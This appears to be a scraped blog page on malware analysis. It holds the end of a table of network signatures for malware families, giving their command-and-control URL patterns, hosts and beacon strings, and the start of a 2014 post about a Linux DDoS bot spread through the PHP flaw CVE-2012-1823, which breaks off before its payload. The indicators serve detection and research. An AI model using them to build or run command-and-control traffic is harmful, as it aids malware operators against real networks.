<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cobra / Turla"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cobra / Turla</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/%s/%s?\nuid=%d&context=%s&mode=text&data=%s"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/%s/%s?<br />uid=%d&context=%s&mode=text&data=%s</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Panda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Panda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/forum/login.cgi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/forum/login.cgi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Panda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Panda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/Photos/Query.cgi?loginid="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Photos/Query.cgi?loginid=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Aided Frame"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Aided Frame</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/img/js.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/img/js.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Scanbox Watering hole framework"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Scanbox Watering hole framework</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/i/recv.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/i/recv.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blackenergy DDos Bot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackenergy DDos Bot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Syria Twitter. apk"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Syria Twitter. apk</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/contacts"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/contacts</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: bottom;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"TinyBaron / Miniduke / CosmicDuke"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TinyBaron / Miniduke / CosmicDuke</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /modules/db/mgr.php?\n /modules/db/mgr.php?F=3?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /modules/db/mgr.php?<br /> /modules/db/mgr.php?F=3?</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME?</span></td><td data-sheets-value="[null,2,"Moure"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Moure</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=\n /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k\n /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n\n /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr\n /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu\n /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=<br /> /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k<br /> /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n<br /> /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr<br /> /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu<br /> /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vundo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vundo</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /webhp\n /wpad.dat"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /webhp<br /> /wpad.dat</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME / APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME / APT</span></td><td data-sheets-value="[null,2,"Lostdoor RAT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Lostdoor RAT</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\cmd.exe|2:13:42"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\WINDOWS\\\\system32\\\\cmd.exe|2:13:42</time></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Protux worm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Protux worm</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"\" http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 \n http://202.71.136.14:80/ggBwkFNqDu1869.avi\n /newTroy.jpg\" \n /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">" http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 <br /> http://202.71.136.14:80/ggBwkFNqDu1869.avi<br /> /newTroy.jpg" <br /> /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Conficker / Kido worm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Conficker / Kido worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ ip checking services"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ ip checking services</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dingu / Proxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dingu / Proxy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /1.jpg\n http://webemail.bounceme.net:8080/directget42.gif"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /1.jpg<br /> http://webemail.bounceme.net:8080/directget42.gif</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1/manualec.pdf"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1/manualec.pdf</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ycJ2Jj7r4t3wc6y4/ali.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ycJ2Jj7r4t3wc6y4/ali.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/tpnofu223t8h8dl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/tpnofu223t8h8dl</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2," /4175iq691v3l \n GET /raw <ip-addr.es>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /4175iq691v3l <br /> GET /raw <ip-addr .es=""></ip-addr></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Galapoper / Tibs Downloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Galapoper / Tibs Downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /pic/tool.jpg\n /pic/search.jpg\n /pic/tibs.jpg\n /pic/proxy.jpg\n /pic/winlogon.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /pic/tool.jpg<br /> /pic/search.jpg<br /> /pic/tibs.jpg<br /> /pic/proxy.jpg<br /> /pic/winlogon.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Wykcores"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Wykcores</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /279843 \n /279859\n /280015\n /287171\n /315171\n /110937\n /111968\n /113000\n /114031\n /115062"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /279843 <br /> /279859<br /> /280015<br /> /287171<br /> /315171<br /> /110937<br /> /111968<br /> /113000<br /> /114031<br /> /115062</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"ADV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">ADV</span></td><td data-sheets-value="[null,2,"Ads - Zenovia Digital Exchange (not necessarily malicious)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Ads - Zenovia Digital Exchange (not necessarily malicious)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EsFury worm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EsFury worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA\nhttp://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA<br />http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"PornoAsset / LockEmAll Ransomware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">PornoAsset / LockEmAll Ransomware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/a.php?f=647&e=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/a.php?f=647&e=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"FakeAV Privacy Center"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">FakeAV Privacy Center</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /dfgsdfsdf.php\n /mf.php\n /css/new-mobile.css\n /js/wsjs.js\n /js/caf.js"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /dfgsdfsdf.php<br /> /mf.php<br /> /css/new-mobile.css<br /> /js/wsjs.js<br /> /js/caf.js</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus V2 (drop zone, config)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus V2 (drop zone, config)</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2," /panel3/gotobank.php \n /panel3/ppnl3.exe\n /panel3/ppnl3.bin\n /ppnl3.bin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /panel3/gotobank.php <br /> /panel3/ppnl3.exe<br /> /panel3/ppnl3.bin<br /> /ppnl3.bin</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blathla / Cadro adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blathla / Cadro adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1.gif"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1.gif</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vundo / Krap"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vundo / Krap</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vundo / Krap"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vundo / Krap</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"VOlk bot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">VOlk bot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1\nUser-Agent: vb wininet\nHost: portalcinemark.us"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1<br />User-Agent: vb wininet<br />Host: portalcinemark.us</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Oficla / Sasfis"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Oficla / Sasfis</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /21/download.php?expid=0&fid=1\n /s/download.php?expid=4&fid=1\n /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3\n /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3\n /np/load.php?spl=hcp&b=ff&o=xp&i=hcp\n /phpbb/image2/cp.php?i=15"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /21/download.php?expid=0&fid=1<br /> /s/download.php?expid=4&fid=1<br /> /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3<br /> /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3<br /> /np/load.php?spl=hcp&b=ff&o=xp&i=hcp<br /> /phpbb/image2/cp.php?i=15</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Pingbed"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Pingbed</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/default.htm\n/default1.htm\n/default2.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/default.htm<br />/default1.htm<br />/default2.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Minaps backdoor"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Minaps backdoor</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2," /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko\n /download/logo.png \n /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A\n POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko<br /> /download/logo.png <br /> /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A<br /> POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"QHost / Orsam / Bicololo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">QHost / Orsam / Bicololo</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/stat/tuk/183"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/stat/tuk/183</span></td></tr>
</tbody></table>
<div>
</div>
</div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com15tag:blogger.com,1999:blog-74827929652568895.post-65128987127398285952014-07-08T14:24:00.001-04:002014-07-08T14:24:18.656-04:00Another Linux DDoS bot via CVE-2012-1823<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
If you run a web server, you should be very familiar with the PHP vulnerability classified as <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823" target="_blank">CVE-2012-1823</a>. Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string. Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot. </div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
Our friends at <a href="http://malwaremustdie.org/" target="_blank">MalwareMustDie</a> have recently put up <a href="http://blog.malwaremustdie.org/" target="_blank">several excellent posts</a> discussing Linux malware, particularly dealing with DDoS. While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up. We like to study and track these variants and infrastructures, as well as the payloads that are being injected. In this case, one particular payload caught our eye.</div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br clear="none" /></div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
In this case, the exploit attempt had URL encoding of:</div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
